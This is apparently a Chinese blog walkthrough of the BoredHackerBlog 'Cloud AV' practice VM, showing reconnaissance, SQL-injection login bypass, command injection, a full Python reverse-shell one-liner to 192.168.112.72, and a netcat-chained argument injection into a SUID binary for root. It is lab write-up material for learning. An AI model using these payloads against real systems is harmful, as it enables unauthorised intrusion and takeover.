BoredHackerBlog: Cloud AV RT日记

简介: BoredHackerBlog: Cloud AV RT日记

信息搜集


首先ifconfig查看自己IP,

netdiscover查看同网段下主机

第三个应该是目标靶机。用nmap查看靶机开放端口:

开放22和8080,看看8080开的啥服务


WEB


看到让我们输入邀请码。有输入框的第一个反应是RCE,尝试几次后无果。后续测试SQL注入,发现在输入"时报错

Flask框架,最后一段报错信息直接看到搜索逻辑源码

输入其它内容时全部回显

推断布尔盲注,order by 尝试字段数


1" order by 1--+ 正常

1" order by 2--+ 报错

后续尝试


1" and left(version(),1)=5 --+


无果


直接:

1" or 1=1 --+

emmmm,进来了


还是看看能否RCE


输入111|ls

拿shell


出了,弹个shell试试

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.112.72",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

成了

看看文件权限

有一个ROOT文件,下面有它的C文件,读一下看看

发现程序定义了一个执行参数,如果程序在执行中不包含参数,则会打印出:

This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;

如果执行程序使用了参数,那么程序就会执行freshclam


可以试试提权:

./update_cloudav "666 | nc 192.168.112.72 5555|/bin/bash|nc 192.168.112.72 6666"

拿到ROOT权限

目录
相关文章
|
12天前
|
传感器 缓存 安全
内容安全(AV)
内容安全(AV)
16 6
|
10月前
|
存储
av_register_all分析
av_register_all分析
56 0
av_register_all分析
|
7月前
|
安全 网络安全 量子技术
即时通讯技术文集(第23期):IM安全相关文章(Part12) [共15篇]
为了更好地分类阅读 52im.net 总计1000多篇精编文章,我将在每周三推送新的一期技术文集,本次是第23 期。
38 0
|
7月前
|
安全 算法 Java
即时通讯技术文集(第22期):IM安全相关文章(Part1) [共13篇]
​为了更好地分类阅读 52im.net 总计1000多篇精编文章,我将在每周三推送新的一期技术文集,本次是第22 期。
38 0
|
Java API Maven
Elasitcsearch High Level Rest Client学习笔记(一) - 木子H的个人空间 - OSCHINA
Elasitcsearch High Level Rest Client学习笔记(一) - 木子H的个人空间 - OSCHINA
|
存储 JSON 缓存
Elasitcsearch High Level Rest Client学习笔记(二) 基础API - 木子H的个人空间 - OSCHINA
Elasitcsearch High Level Rest Client学习笔记(二) 基础API - 木子H的个人空间 - OSCHINA
|
分布式计算 物联网 Apache
《Analyzing IOT Data in Apache Spark Across Data Centers and Cloud》电子版地址
Analyzing IOT Data in Apache Spark Across Data Centers and Cloud
91 0
《Analyzing IOT Data in Apache Spark Across Data Centers and Cloud》电子版地址
|
编解码 数据挖掘 ice
Google Earth Engine ——数据全解析专辑(COPERNICUS/S2_SR)20154至今哨兵-2号(SR) 数据集
Google Earth Engine ——数据全解析专辑(COPERNICUS/S2_SR)20154至今哨兵-2号(SR) 数据集
570 0
Google Earth Engine ——数据全解析专辑(COPERNICUS/S2_SR)20154至今哨兵-2号(SR) 数据集
|
C++
Epic 官方视频教程《 Battery Collector》源码+超详细注释【C++】【UE4】
Epic 官方视频教程《 Battery Collector》源码+超详细注释【C++】【UE4】
236 0
Epic 官方视频教程《 Battery Collector》源码+超详细注释【C++】【UE4】
[升级说明] Senparc.Weixin.MP v14.8.11 (微信群发接口调整)
升级内容:添加根据标签群发接口,重构原根据分组群发接口    参考微信文档:https://mp.weixin.qq.com/wiki?t=resource/res_main&id=mp1481187827_i0l21    说明:     之前 SDK 只提供了根据用户组群发的方法: 1 GroupMessageApi.
1469 0

热门文章

最新文章